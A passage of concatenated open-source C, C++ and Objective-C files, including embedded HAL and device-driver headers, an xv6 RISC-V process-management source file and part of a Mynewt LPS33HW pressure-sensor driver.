#ifdef HAL_USART_MODULE_ENABLED #include "stm32f1xx_hal_usart.h" #endif /* HAL_USART_MODULE_ENABLED */ #ifdef HAL_IRDA_MODULE_ENABLED #include "stm32f1xx_hal_irda.h" #endif /* HAL_IRDA_MODULE_ENABLED */ #ifdef HAL_SMARTCARD_MODULE_ENABLED #include "stm32f1xx_hal_smartcard.h" #endif /* HAL_SMARTCARD_MODULE_ENABLED */ #ifdef HAL_WWDG_MODULE_ENABLED #include "stm32f1xx_hal_wwdg.h" #endif /* HAL_WWDG_MODULE_ENABLED */ #ifdef HAL_PCD_MODULE_ENABLED #include "stm32f1xx_hal_pcd.h" #endif /* HAL_PCD_MODULE_ENABLED */ #ifdef HAL_HCD_MODULE_ENABLED #include "stm32f1xx_hal_hcd.h" #endif /* HAL_HCD_MODULE_ENABLED */ /* Exported macro ------------------------------------------------------------*/ #ifdef USE_FULL_ASSERT /** * @brief The assert_param macro is used for function's parameters check. * @param expr: If expr is false, it calls assert_failed function * which reports the name of the source file and the source * line number of the call that failed. * If expr is true, it returns no value. * @retval None */ #define assert_param(expr) ((expr) ? (void)0U : assert_failed((uint8_t *)__FILE__, __LINE__)) /* Exported functions ------------------------------------------------------- */ void assert_failed(uint8_t* file, uint32_t line); #else #define assert_param(expr) ((void)0U) #endif /* USE_FULL_ASSERT */ #ifdef __cplusplus } #endif #endif /* __STM32F1xx_HAL_CONF_H */ /************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/
/* * PSP Software Development Kit - https://github.com/pspdev * ----------------------------------------------------------------------- * Licensed under the BSD license, see LICENSE in PSPSDK root for details. * * psputility_modules.h - Load modules from user mode * * Copyright (c) 2008 David Perry <tias_dp@hotmail.com> * */ #ifndef __PSPUTILITY_MODULES_H__ #define __PSPUTILITY_MODULES_H__ #ifdef __cplusplus extern "C" { #endif #include <psptypes.h> /* Net Modules */ #define PSP_MODULE_NET_COMMON 0x0100 #define PSP_MODULE_NET_ADHOC 0x0101 #define PSP_MODULE_NET_INET 0x0102 #define PSP_MODULE_NET_PARSEURI 0x0103 #define PSP_MODULE_NET_PARSEHTTP 0x0104 #define PSP_MODULE_NET_HTTP 0x0105 #define PSP_MODULE_NET_SSL 0x0106 /* USB Modules */ #define PSP_MODULE_USB_PSPCM 0x0200 #define PSP_MODULE_USB_MIC 0x0201 #define PSP_MODULE_USB_CAM 0x0202 #define PSP_MODULE_USB_GPS 0x0203 /* Audio/video Modules */ #define PSP_MODULE_AV_AVCODEC 0x0300 #define PSP_MODULE_AV_SASCORE 0x0301 #define PSP_MODULE_AV_ATRAC3PLUS 0x0302 #define PSP_MODULE_AV_MPEGBASE 0x0303 #define PSP_MODULE_AV_MP3 0x0304 #define PSP_MODULE_AV_VAUDIO 0x0305 #define PSP_MODULE_AV_AAC 0x0306 #define PSP_MODULE_AV_G729 0x0307 /* NP */ #define PSP_MODULE_NP_COMMON 0x0400 #define PSP_MODULE_NP_SERVICE 0x0401 #define PSP_MODULE_NP_MATCHING2 0x0402 #define PSP_MODULE_NP_DRM 0x0500 /* IrDA */ #define PSP_MODULE_IRDA 0x0600 /** * Load a module (PRX) from user mode. * * @param module - module to load (PSP_MODULE_xxx) * * @return 0 on success, < 0 on error */ int sceUtilityLoadModule(int module); /** * Unload a module (PRX) from user mode. * * @param module - module to unload (PSP_MODULE_xxx) * * @return 0 on success, < 0 on error */ int sceUtilityUnloadModule(int module); #ifdef __cplusplus } #endif #endif
/* Copyright 2019 The TensorFlow Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ==============================================================================*/ #ifndef TENSORFLOW_COMPILER_XLA_SERVICE_GPU_TARGET_UTIL_H_ #define TENSORFLOW_COMPILER_XLA_SERVICE_GPU_TARGET_UTIL_H_ #include <string> #include "absl/strings/string_view.h" #include "absl/types/span.h" #include "llvm/ADT/StringRef.h" #include "llvm/ADT/Triple.h" #include "llvm/IR/IRBuilder.h" #include "llvm/IR/Intrinsics.h" #include "llvm/IR/Module.h" namespace xla { namespace gpu { // Enmeration to get target specific intrinsics. enum class TargetIntrinsicID { kThreadIdx = 0, kThreadIdy, kThreadIdz, kBlockIdx, kBlockIdy, kBlockIdz, kBarrierId, }; // Emits a call to the specified target intrinsic with the given operands. // Overloaded intrinsics (for example, "minnum") must include a type // in overloaded_types for each overloaded type. Typically, overloaded // intrinsics have only a single overloaded type. llvm::CallInst* EmitCallToTargetIntrinsic( TargetIntrinsicID intrinsic_id, absl::Span<llvm::Value* const> operands, absl::Span<llvm::Type* const> overloaded_types, llvm::IRBuilder<>* b); // Annotate the kernel as GPU kernel according to the GPU target. void AnnotateFunctionAsGpuKernel(llvm::Module* module, llvm::Function* func, llvm::IRBuilder<>* b); } // namespace gpu } // namespace xla #endif // TENSORFLOW_COMPILER_XLA_SERVICE_GPU_TARGET_UTIL_H_
/* * This header is generated by classdump-dyld 1.0 * on Sunday, September 27, 2020 at 11:54:43 AM Mountain Standard Time * Operating System: Version 14.0 (Build 18A373) * Image Source: /System/Library/PrivateFrameworks/MessageSecurity.framework/MessageSecurity * classdump-dyld is licensed under GPLv3, Copyright © 2013-2016 by Elias Limneos. */ @class MSOID, NSData; @protocol MSCMSMessage <MSMessage> @property (readonly) MSOID * type; @property (nonatomic,retain) NSData * dataContent; @property (retain) id<MSCMSMessage> embeddedContent; @property (retain) MSOID * contentType; @required -(MSOID *)contentType; -(MSOID *)type; -(void)setContentType:(id)arg1; -(void)setDataContent:(id)arg1; -(NSData *)dataContent; -(void)setEmbeddedContent:(id)arg1; -(id<MSCMSMessage>)embeddedContent; @end
// // QJCTabBarController.h // singdemo // // Created by MYMAc on 2018/7/21. // Copyright © 2018年 ShangYu. All rights reserved. // #import <UIKit/UIKit.h> @interface QJCTabBarController : UITabBarController @end
#ifndef __PN532_INTERFACE_H__ #define __PN532_INTERFACE_H__ #include <stdint.h> #define PN532_PREAMBLE (0x00) #define PN532_STARTCODE1 (0x00) #define PN532_STARTCODE2 (0xFF) #define PN532_POSTAMBLE (0x00) #define PN532_HOSTTOPN532 (0xD4) #define PN532_PN532TOHOST (0xD5) #define PN532_ACK_WAIT_TIME (10) // ms, timeout of waiting for ACK #define PN532_INVALID_ACK (-1) #define PN532_TIMEOUT (-2) #define PN532_INVALID_FRAME (-3) #define PN532_NO_SPACE (-4) #define REVERSE_BITS_ORDER(b) b = (b & 0xF0) >> 4 | (b & 0x0F) << 4; \ b = (b & 0xCC) >> 2 | (b & 0x33) << 2; \ b = (b & 0xAA) >> 1 | (b & 0x55) << 1 class PN532Interface { public: virtual void begin() = 0; virtual void wakeup() = 0; /** @brief write a command and check ack @param header packet header @param hlen length of header @param body packet body @param blen length of body @return 0 success not 0 failed */ virtual int8_t writeCommand(const uint8_t* header, uint8_t hlen, const uint8_t* body = 0, uint8_t blen = 0) = 0; /** @brief read the response of a command, strip prefix and suffix @param buf to contain the response data @param len lenght to read @param timeout max time to wait, 0 means no timeout @return >=0 length of response without prefix and suffix <0 failed to read response */ virtual int16_t readResponse(uint8_t buf[], uint8_t len, uint16_t timeout = 1000) = 0; }; #endif
#ifndef KAZUCOIN_QT_TEST_ADDRESSBOOKTESTS_H #define KAZUCOIN_QT_TEST_ADDRESSBOOKTESTS_H #include <QObject> #include <QTest> class AddressBookTests : public QObject { Q_OBJECT private Q_SLOTS: void addressBookTests(); }; #endif // KAZUCOIN_QT_TEST_ADDRESSBOOKTESTS_H
#ifndef AUDIOVISUALIZATION_H_ #define AUDIOVISUALIZATION_H_ #include "main.h" #include "tim.h" #include "arm_math.h" #include "ringBuffer.h" #include "Device.h" #include "feature_extraction.h" #include "NN.h" #include "NN_Detection.h" #define NN_AUDIO_BUFFER_SIZE 3072U #define AUDIO_PROCESSING_BUFFER_SIZE 2048U #define AUDIO_PROCESSING_FFT_SIZE 1024U #define NN_MFCC_COLUMNS 15U #define NN_MFCC_COLUMNS_ALT 29U #define NN_MFCC_COUNT 21U #define AUDIO_PROCESSING_MFCC_COUNT 30U #define AUDIO_PROCESSING_MFCC_SAMPLING_FREQUENCY 16000U #define AUDIO_PROCESSING_MFCC_NYQUIST_FREQUENCY (AUDIO_PROCESSING_MFCC_SAMPLING_FREQUENCY / 2) #define AUDIO_VISUALIZATION_MAX_VOLUME_RESET_PERIOD 30000U void audioProcessing_Init(); ringBufferStatus audioProcessing_AddData(int16_t *data, uint32_t size, audioInputState source); void audioProcessing_ClearBuffer(); void NN_ClearAudioBuffer(); uint8_t audioProcessing_Run(); float log10_approx(float x); #endif
#ifndef COLORPICKER_H #define COLORPICKER_H #include <QWidget> #include <QScopedPointer> #include <QMap> #include <QEventLoop> #include <QPointer> namespace Ui { class ColorPicker; }; #include "AbstractColorPicker.h" class EyeDropper; class ColorPicker : public AbstractColorPicker { Q_OBJECT private: typedef QMap<QString, QPointer<AbstractColorPicker>> PickerMap; public: explicit ColorPicker(QWidget* parent = 0); ~ColorPicker(); void exec(); protected: void RegisterPicker(const QString& key, AbstractColorPicker* picker); void RegisterColorSpace(const QString& key, AbstractColorPicker* picker); void SetColorInternal(const QColor& c) override; private slots: void OnChanging(const QColor& c); void OnChanged(const QColor& c); void OnDropperChanged(const QColor& c); void OnDropper(); private: void UpdateControls(const QColor& c, AbstractColorPicker* source = NULL); void ConnectPicker(AbstractColorPicker* picker); void closeEvent(QCloseEvent* e); QScopedPointer<Ui::ColorPicker> ui; QPointer<EyeDropper> dropper; PickerMap pickers; PickerMap colorSpaces; QEventLoop modalLoop; }; #endif // COLORPICKER_H
#include "types.h" #include "param.h" #include "memlayout.h" #include "riscv.h" #include "spinlock.h" #include "proc.h" #include "defs.h" struct cpu cpus[NCPU]; struct proc proc[NPROC]; struct proc *initproc; int nextpid = 1; struct spinlock pid_lock; extern void forkret(void); static void wakeup1(struct proc *chan); static void freeproc(struct proc *p); extern char trampoline[]; // trampoline.S // initialize the proc table at boot time. void procinit(void) { struct proc *p; initlock(&pid_lock, "nextpid"); for(p = proc; p < &proc[NPROC]; p++) { initlock(&p->lock, "proc"); // Allocate a page for the process's kernel stack. // Map it high in memory, followed by an invalid // guard page. char *pa = kalloc(); if(pa == 0) panic("kalloc"); uint64 va = KSTACK((int) (p - proc)); kvmmap(va, (uint64)pa, PGSIZE, PTE_R | PTE_W); p->kstack = va; } kvminithart(); } // Must be called with interrupts disabled, // to prevent race with process being moved // to a different CPU. int cpuid() { int id = r_tp(); return id; } // Return this CPU's cpu struct. // Interrupts must be disabled. struct cpu* mycpu(void) { int id = cpuid(); struct cpu *c = &cpus[id]; return c; } // Return the current struct proc *, or zero if none. struct proc* myproc(void) { push_off(); struct cpu *c = mycpu(); struct proc *p = c->proc; pop_off(); return p; } int allocpid() { int pid; acquire(&pid_lock); pid = nextpid; nextpid = nextpid + 1; release(&pid_lock); return pid; } // Look in the process table for an UNUSED proc. // If found, initialize state required to run in the kernel, // and return with p->lock held. // If there are no free procs, or a memory allocation fails, return 0. static struct proc* allocproc(void) { struct proc *p; for(p = proc; p < &proc[NPROC]; p++) { acquire(&p->lock); if(p->state == UNUSED) { goto found; } else { release(&p->lock); } } return 0; found: p->pid = allocpid(); // Allocate a trapframe page. if((p->trapframe = (struct trapframe *)kalloc()) == 0){ release(&p->lock); return 0; } p->kpagetable = kvmpgmake(); // An empty user page table. p->pagetable = proc_pagetable(p); if(p->pagetable == 0){ freeproc(p); release(&p->lock); return 0; } // Set up new context to start executing at forkret, // which returns to user space. memset(&p->context, 0, sizeof(p->context)); p->context.ra = (uint64)forkret; p->context.sp = p->kstack + PGSIZE; return p; } // free a proc structure and the data hanging from it, // including user pages. // p->lock must be held. static void freeproc(struct proc *p) { if(p->trapframe) kfree((void*)p->trapframe); p->trapframe = 0; if(p->pagetable) proc_freepagetable(p->pagetable, p->sz); p->pagetable = 0; if(p->kpagetable) kvmpgfree(p->kpagetable); p->kpagetable = 0; p->sz = 0; p->pid = 0; p->parent = 0; p->name[0] = 0; p->chan = 0; p->killed = 0; p->xstate = 0; p->state = UNUSED; } // Create a user page table for a given process, // with no user memory, but with trampoline pages. pagetable_t proc_pagetable(struct proc *p) { pagetable_t pagetable; // An empty page table. pagetable = uvmcreate(); if(pagetable == 0) return 0; // map the trampoline code (for system call return) // at the highest user virtual address. // only the supervisor uses it, on the way // to/from user space, so not PTE_U. if(mappages(pagetable, TRAMPOLINE, PGSIZE, (uint64)trampoline, PTE_R | PTE_X) < 0){ uvmfree(pagetable, 0); return 0; } // map the trapframe just below TRAMPOLINE, for trampoline.S. if(mappages(pagetable, TRAPFRAME, PGSIZE, (uint64)(p->trapframe), PTE_R | PTE_W) < 0){ uvmunmap(pagetable, TRAMPOLINE, 1, 0); uvmfree(pagetable, 0); return 0; } return pagetable; } // Free a process's page table, and free the // physical memory it refers to. void proc_freepagetable(pagetable_t pagetable, uint64 sz) { uvmunmap(pagetable, TRAMPOLINE, 1, 0); uvmunmap(pagetable, TRAPFRAME, 1, 0); uvmfree(pagetable, sz); } // a user program that calls exec("/init") // od -t xC initcode uchar initcode[] = { 0x17, 0x05, 0x00, 0x00, 0x13, 0x05, 0x45, 0x02, 0x97, 0x05, 0x00, 0x00, 0x93, 0x85, 0x35, 0x02, 0x93, 0x08, 0x70, 0x00, 0x73, 0x00, 0x00, 0x00, 0x93, 0x08, 0x20, 0x00, 0x73, 0x00, 0x00, 0x00, 0xef, 0xf0, 0x9f, 0xff, 0x2f, 0x69, 0x6e, 0x69, 0x74, 0x00, 0x00, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; // Set up first user process. void userinit(void) { struct proc *p; p = allocproc(); initproc = p; // allocate one user page and copy init's instructions // and data into it. uvminit(p->pagetable, initcode, sizeof(initcode)); p->sz = PGSIZE; kvmmpuser(p->pagetable, p->kpagetable,p->sz,0); // prepare for the very first "return" from kernel to user. p->trapframe->epc = 0; // user program counter p->trapframe->sp = PGSIZE; // user stack pointer safestrcpy(p->name, "initcode", sizeof(p->name)); p->cwd = namei("/"); p->state = RUNNABLE; release(&p->lock); } // Grow or shrink user memory by n bytes. // Return 0 on success, -1 on failure. int growproc(int n) { uint sz; struct proc *p = myproc(); if(p->sz + n >= PLIC) return -1; sz = p->sz; if(n > 0){ if((sz = uvmalloc(p->pagetable, sz, sz + n)) == 0) { return -1; } } else if(n < 0){ sz = uvmdealloc(p->pagetable, sz, sz + n); } kvmmpuser(p->pagetable, p->kpagetable,sz,p->sz); p->sz = sz; return 0; } // Create a new process, copying the parent. // Sets up child kernel stack to return as if from fork() system call. int fork(void) { int i, pid; struct proc *np; struct proc *p = myproc(); // Allocate process. if((np = allocproc()) == 0){ return -1; } // Copy user memory from parent to child. if(uvmcopy(p->pagetable, np->pagetable, p->sz) < 0){ freeproc(np); release(&np->lock); return -1; } np->sz = p->sz; np->parent = p; // copy saved user registers. *(np->trapframe) = *(p->trapframe); // Cause fork to return 0 in the child. np->trapframe->a0 = 0; // increment reference counts on open file descriptors. for(i = 0; i < NOFILE; i++) if(p->ofile[i]) np->ofile[i] = filedup(p->ofile[i]); np->cwd = idup(p->cwd); safestrcpy(np->name, p->name, sizeof(p->name)); pid = np->pid; np->state = RUNNABLE; kvmmpuser(np->pagetable, np->kpagetable,np->sz,0); release(&np->lock); return pid; } // Pass p's abandoned children to init. // Caller must hold p->lock. void reparent(struct proc *p) { struct proc *pp; for(pp = proc; pp < &proc[NPROC]; pp++){ // this code uses pp->parent without holding pp->lock. // acquiring the lock first could cause a deadlock // if pp or a child of pp were also in exit() // and about to try to lock p. if(pp->parent == p){ // pp->parent can't change between the check and the acquire() // because only the parent changes it, and we're the parent. acquire(&pp->lock); pp->parent = initproc; // we should wake up init here, but that would require // initproc->lock, which would be a deadlock, since we hold // the lock on one of init's children (pp). this is why // exit() always wakes init (before acquiring any locks). release(&pp->lock); } } } // Exit the current process. Does not return. // An exited process remains in the zombie state // until its parent calls wait(). void exit(int status) { struct proc *p = myproc(); if(p == initproc) panic("init exiting"); // Close all open files. for(int fd = 0; fd < NOFILE; fd++){ if(p->ofile[fd]){ struct file *f = p->ofile[fd]; fileclose(f); p->ofile[fd] = 0; } } begin_op(); iput(p->cwd); end_op(); p->cwd = 0; // we might re-parent a child to init. we can't be precise about // waking up init, since we can't acquire its lock once we've // acquired any other proc lock. so wake up init whether that's // necessary or not. init may miss this wakeup, but that seems // harmless. acquire(&initproc->lock); wakeup1(initproc); release(&initproc->lock); // grab a copy of p->parent, to ensure that we unlock the same // parent we locked. in case our parent gives us away to init while // we're waiting for the parent lock. we may then race with an // exiting parent, but the result will be a harmless spurious wakeup // to a dead or wrong process; proc structs are never re-allocated // as anything else. acquire(&p->lock); struct proc *original_parent = p->parent; release(&p->lock); // we need the parent's lock in order to wake it up from wait(). // the parent-then-child rule says we have to lock it first. acquire(&original_parent->lock); acquire(&p->lock); // Give any children to init. reparent(p); // Parent might be sleeping in wait(). wakeup1(original_parent); p->xstate = status; p->state = ZOMBIE; release(&original_parent->lock); // Jump into the scheduler, never to return. sched(); panic("zombie exit"); } // Wait for a child process to exit and return its pid. // Return -1 if this process has no children. int wait(uint64 addr) { struct proc *np; int havekids, pid; struct proc *p = myproc(); // hold p->lock for the whole time to avoid lost // wakeups from a child's exit(). acquire(&p->lock); for(;;){ // Scan through table looking for exited children. havekids = 0; for(np = proc; np < &proc[NPROC]; np++){ // this code uses np->parent without holding np->lock. // acquiring the lock first would cause a deadlock, // since np might be an ancestor, and we already hold p->lock. if(np->parent == p){ // np->parent can't change between the check and the acquire() // because only the parent changes it, and we're the parent. acquire(&np->lock); havekids = 1; if(np->state == ZOMBIE){ // Found one. pid = np->pid; if(addr != 0 && copyout(p->pagetable, addr, (char *)&np->xstate, sizeof(np->xstate)) < 0) { release(&np->lock); release(&p->lock); return -1; } freeproc(np); release(&np->lock); release(&p->lock); return pid; } release(&np->lock); } } // No point waiting if we don't have any children. if(!havekids || p->killed){ release(&p->lock); return -1; } // Wait for a child to exit. sleep(p, &p->lock); //DOC: wait-sleep } } // Per-CPU process scheduler. // Each CPU calls scheduler() after setting itself up. // Scheduler never returns. It loops, doing: // - choose a process to run. // - swtch to start running that process. // - eventually that process transfers control // via swtch back to the scheduler. void scheduler(void) { struct proc *p; struct cpu *c = mycpu(); c->proc = 0; for(;;){ // Avoid deadlock by ensuring that devices can interrupt. intr_on(); int found = 0; for(p = proc; p < &proc[NPROC]; p++) { acquire(&p->lock); if(p->state == RUNNABLE) { // Switch to chosen process. It is the process's job // to release its lock and then reacquire it // before jumping back to us. p->state = RUNNING; c->proc = p; w_satp(MAKE_SATP(p->kpagetable)); sfence_vma(); swtch(&c->context, &p->context); kvminithart(); // Process is done running for now. // It should have changed its p->state before coming back. c->proc = 0; found = 1; } release(&p->lock); } #if !defined (LAB_FS) if(found == 0) { intr_on(); asm volatile("wfi"); } #else ; #endif } } // Switch to scheduler. Must hold only p->lock // and have changed proc->state. Saves and restores // intena because intena is a property of this // kernel thread, not this CPU. It should // be proc->intena and proc->noff, but that would // break in the few places where a lock is held but // there's no process. void sched(void) { int intena; struct proc *p = myproc(); if(!holding(&p->lock)) panic("sched p->lock"); if(mycpu()->noff != 1) panic("sched locks"); if(p->state == RUNNING) panic("sched running"); if(intr_get()) panic("sched interruptible"); intena = mycpu()->intena; swtch(&p->context, &mycpu()->context); mycpu()->intena = intena; } // Give up the CPU for one scheduling round. void yield(void) { struct proc *p = myproc(); acquire(&p->lock); p->state = RUNNABLE; sched(); release(&p->lock); } // A fork child's very first scheduling by scheduler() // will swtch to forkret. void forkret(void) { static int first = 1; // Still holding p->lock from scheduler. release(&myproc()->lock); if (first) { // File system initialization must be run in the context of a // regular process (e.g., because it calls sleep), and thus cannot // be run from main(). first = 0; fsinit(ROOTDEV); } usertrapret(); } // Atomically release lock and sleep on chan. // Reacquires lock when awakened. void sleep(void *chan, struct spinlock *lk) { struct proc *p = myproc(); // Must acquire p->lock in order to // change p->state and then call sched. // Once we hold p->lock, we can be // guaranteed that we won't miss any wakeup // (wakeup locks p->lock), // so it's okay to release lk. if(lk != &p->lock){ //DOC: sleeplock0 acquire(&p->lock); //DOC: sleeplock1 release(lk); } // Go to sleep. p->chan = chan; p->state = SLEEPING; sched(); // Tidy up. p->chan = 0; // Reacquire original lock. if(lk != &p->lock){ release(&p->lock); acquire(lk); } } // Wake up all processes sleeping on chan. // Must be called without any p->lock. void wakeup(void *chan) { struct proc *p; for(p = proc; p < &proc[NPROC]; p++) { acquire(&p->lock); if(p->state == SLEEPING && p->chan == chan) { p->state = RUNNABLE; } release(&p->lock); } } // Wake up p if it is sleeping in wait(); used by exit(). // Caller must hold p->lock. static void wakeup1(struct proc *p) { if(!holding(&p->lock)) panic("wakeup1"); if(p->chan == p && p->state == SLEEPING) { p->state = RUNNABLE; } } // Kill the process with the given pid. // The victim won't exit until it tries to return // to user space (see usertrap() in trap.c). int kill(int pid) { struct proc *p; for(p = proc; p < &proc[NPROC]; p++){ acquire(&p->lock); if(p->pid == pid){ p->killed = 1; if(p->state == SLEEPING){ // Wake process from sleep(). p->state = RUNNABLE; } release(&p->lock); return 0; } release(&p->lock); } return -1; } // Copy to either a user address, or kernel address, // depending on usr_dst. // Returns 0 on success, -1 on error. int either_copyout(int user_dst, uint64 dst, void *src, uint64 len) { struct proc *p = myproc(); if(user_dst){ return copyout(p->pagetable, dst, src, len); } else { memmove((char *)dst, src, len); return 0; } } // Copy from either a user address, or kernel address, // depending on usr_src. // Returns 0 on success, -1 on error. int either_copyin(void *dst, int user_src, uint64 src, uint64 len) { struct proc *p = myproc(); if(user_src){ return copyin(p->pagetable, dst, src, len); } else { memmove(dst, (char*)src, len); return 0; } } // Print a process listing to console. For debugging. // Runs when user types ^P on console. // No lock to avoid wedging a stuck machine further. void procdump(void) { static char *states[] = { [UNUSED] "unused", [SLEEPING] "sleep ", [RUNNABLE] "runble", [RUNNING] "run ", [ZOMBIE] "zombie" }; struct proc *p; char *state; printf("\n"); for(p = proc; p < &proc[NPROC]; p++){ if(p->state == UNUSED) continue; if(p->state >= 0 && p->state < NELEM(states) && states[p->state]) state = states[p->state]; else state = "???"; printf("%d %s %s", p->pid, state, p->name); printf("\n"); } }
/* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * resarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ #include <string.h> #include <errno.h> #include <assert.h> #include <math.h> #include "os/mynewt.h" #include "hal/hal_i2c.h" #include "hal/hal_spi.h" #include "hal/hal_gpio.h" #include "sensor/sensor.h" #include "sensor/pressure.h" #include "sensor/temperature.h" #include "lps33hw/lps33hw.h" #include "lps33hw_priv.h" #include "log/log.h" #include "stats/stats.h" static struct hal_spi_settings spi_lps33hw_settings = { .data_order = HAL_SPI_MSB_FIRST, .data_mode = HAL_SPI_MODE3, .baudrate = 4000, .word_size = HAL_SPI_WORD_SIZE_8BIT, }; /* Define the stats section and records */ STATS_SECT_START(lps33hw_stat_section) STATS_SECT_ENTRY(read_errors) STATS_SECT_ENTRY(write_errors) STATS_SECT_END /* Define stat names for querying */ STATS_NAME_START(lps33hw_stat_section) STATS_NAME(lps33hw_stat_section, read_errors) STATS_NAME(lps33hw_stat_section, write_errors) STATS_NAME_END(lps33hw_stat_section) /* Global variable used to hold stats data */ STATS_SECT_DECL(lps33hw_stat_section) g_lps33hwstats; #define LOG_MODULE_LPS33HW (33) #define LPS33HW_INFO(...) LOG_INFO(&_log, LOG_MODULE_LPS33HW, __VA_ARGS__) #define LPS33HW_ERR(...) LOG_ERROR(&_log, LOG_MODULE_LPS33HW, __VA_ARGS__) static struct log _log; #define LPS33HW_PRESS_OUT_DIV (40.96) #define LPS33HW_TEMP_OUT_DIV (100.0) #define LPS33HW_PRESS_THRESH_DIV (16) /* Exports for the sensor API */ static int lps33hw_sensor_read(struct sensor *, sensor_type_t, sensor_data_func_t, void *, uint32_t); static int lps33hw_sensor_get_config(struct sensor *, sensor_type_t, struct sensor_cfg *); static int lps33hw_sensor_set_config(struct sensor *, void *); static int lps33hw_sensor_set_trigger_thresh(struct sensor *sensor, sensor_type_t sensor_type, struct sensor_type_traits *stt); static int lps33hw_sensor_handle_interrupt(struct sensor *sensor); static int lps33hw_sensor_clear_low_thresh(struct sensor *sensor, sensor_type_t type); static int lps33hw_sensor_clear_high_thresh(struct sensor *sensor, sensor_type_t type); static const struct sensor_driver g_lps33hw_sensor_driver = { .sd_read = lps33hw_sensor_read, .sd_get_config = lps33hw_sensor_get_config, .sd_set_config = lps33hw_sensor_set_config, .sd_set_trigger_thresh = lps33hw_sensor_set_trigger_thresh, .sd_handle_interrupt = lps33hw_sensor_handle_interrupt, .sd_clear_low_trigger_thresh = lps33hw_sensor_clear_low_thresh, .sd_clear_high_trigger_thresh = lps33hw_sensor_clear_high_thresh }; /* * Converts pressure value in pascals to a value found in the pressure * threshold register of the device. * * @param Pressure value in pascals. * * @return Pressure value to write to the threshold registers. */ static uint16_t lps33hw_pa_to_threshold_reg(float pa) { /* Threshold is unsigned. */ if (pa < 0) { return 0; } else if (pa == INFINITY) { return 0xffff; } return pa * LPS33HW_PRESS_THRESH_DIV; } /* * Converts pressure value in pascals to a value found in the pressure * reference register of the device. * * @param Pressure value in pascals. * * @return Pressure value to write to the reference registers. */ static int32_t lps33hw_pa_to_reg(float pa) { if (pa == INFINITY) { return 0x007fffff; } return (int32_t)(pa * LPS33HW_PRESS_OUT_DIV); } /* * Converts pressure read from the device output registers to a value in * pascals. * * @param Pressure value read from the output registers. * * @return Pressure value in pascals. */ static float lps33hw_reg_to_pa(int32_t reg) { return reg / LPS33HW_PRESS_OUT_DIV; } /* * Converts temperature read from the device output registers to a value in * degrees C. * * @param Temperature value read from the output registers. * * @return Temperature value in degrees C. */ static float lps33hw_reg_to_degc(int16_t reg) { return reg / LPS33HW_TEMP_OUT_DIV; } /** * Writes a single byte to the specified register using i2c * interface * * @param The sensor interface * @param The register address to write to * @param The value to write * * @return 0 on success, non-zero error on failure. */ static int lps33hw_i2c_set_reg(struct sensor_itf *itf, uint8_t reg, uint8_t value) { int rc; uint8_t payload[2] = { reg, value }; struct hal_i2c_master_data data_struct = { .address = itf->si_addr, .len = 2, .buffer = payload }; rc = hal_i2c_master_write(itf->si_num, &data_struct, OS_TICKS_PER_SEC / 10, 1); if (rc) { LPS33HW_ERR("Failed to write to 0x%02X:0x%02X with value 0x%02X\n", itf->si_addr, reg, value); STATS_INC(g_lps33hwstats, read_errors); } return rc; } /** * Writes a single byte to the specified register using SPI * interface * * @param The sensor interface * @param The register address to write to * @param The value to write * * @return 0 on success, non-zero error on failure. */ static int lps33hw_spi_set_reg(struct sensor_itf *itf, uint8_t reg, uint8_t value) { int rc; /* Select the device */ hal_gpio_write(itf->si_cs_pin, 0); /* Send the register address w/write command */ rc = hal_spi_tx_val(itf->si_num, reg & ~LPS33HW_SPI_READ_CMD_BIT); if (rc == 0xFFFF) { rc = SYS_EINVAL; LPS33HW_ERR("SPI_%u register write failed addr:0x%02X\n", itf->si_num, reg); STATS_INC(g_lps33hwstats, write_errors); goto err; } /* Write data */ rc = hal_spi_tx_val(itf->si_num, value); if (rc == 0xFFFF) { rc = SYS_EINVAL; LPS33HW_ERR("SPI_%u write failed addr:0x%02X\n", itf->si_num, reg); STATS_INC(g_lps33hwstats, write_errors); goto err; } rc = 0; err: /* De-select the device */ hal_gpio_write(itf->si_cs_pin, 1); os_time_delay((OS_TICKS_PER_SEC * 30)/1000 + 1); return rc; } /** * Writes a single byte to the specified register using specified * interface * * @param The sensor interface * @param The register address to write to * @param The value to write * * @return 0 on success, non-zero error on failure. */ static int lps33hw_set_reg(struct sensor_itf *itf, uint8_t reg, uint8_t value) { int rc; if (itf->si_type == SENSOR_ITF_I2C) { rc = lps33hw_i2c_set_reg(itf, reg, value); } else { rc = lps33hw_spi_set_reg(itf, reg, value); } return rc; } /** * * Read bytes from the specified register using SPI interface * * @param The sensor interface * @param The register address to read from * @param The number of bytes to read * @param Pointer to where the register value should be written * * @return 0 on success, non-zero error on failure. */ static int lps33hw_spi_get_regs(struct sensor_itf *itf, uint8_t reg, uint8_t size, uint8_t *buffer) { int i; uint16_t retval; int rc; rc = 0; /* Select the device */ hal_gpio_write(itf->si_cs_pin, 0); /* Send the address */ retval = hal_spi_tx_val(itf->si_num, reg | LPS33HW_SPI_READ_CMD_BIT); if (retval == 0xFFFF) { rc = SYS_EINVAL; LPS33HW_ERR("SPI_%u register write failed addr:0x%02X\n", itf->si_num, reg); STATS_INC(g_lps33hwstats, read_errors); goto err; } for (i = 0; i < size; i++) { /* Read data */ retval = hal_spi_tx_val(itf->si_num, 0); if (retval == 0xFFFF) { rc = SYS_EINVAL; LPS33HW_ERR("SPI_%u read failed addr:0x%02X\n", itf->si_num, reg); STATS_INC(g_lps33hwstats, read_errors); goto err; } buffer[i] = retval; } rc = 0; err: /* De-select the device */ hal_gpio_write(itf->si_cs_pin, 1); return rc; } /** * Read bytes from the specified register using i2c interface * * @param The sensor interface * @param The register address to read from * @param The number of bytes to read * @param Pointer to where the register value should be written * * @return 0 on success, non-zero error on 